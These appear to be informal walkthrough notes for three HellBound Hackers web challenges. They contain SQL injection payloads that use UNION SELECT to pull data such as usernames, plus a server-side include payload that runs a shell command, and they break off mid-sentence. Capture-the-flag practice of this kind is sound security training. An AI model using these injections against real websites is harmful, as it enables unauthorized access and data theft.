********************basic18********************

after we put the ' we check the order by 5%23 in the url and find it is valid 
now we do union select 1,2,3,4,5 from Articles
and this is the url 
https://www.hellboundhackers.org/challenges/basic18/index.php?id=1%27union%20select%201,2,3,4,5%20from%20Articles%23


************************basic21*****************************************

you need to do according to this file http://www.cgisecurity.com/lib/advanced_sql_injection.pdf
you don't need page 9 you can skip it and go to this line

' union select min(username),1,1,1 from users where username >'a'--

************************basic 22**********************
you can read about ssi commands here https://www.owasp.org/index.php/Server-Side_Includes_(SSI)_Injection
so if we put '<!--#exec cmd="ls" -->' we get something 

now we need to 
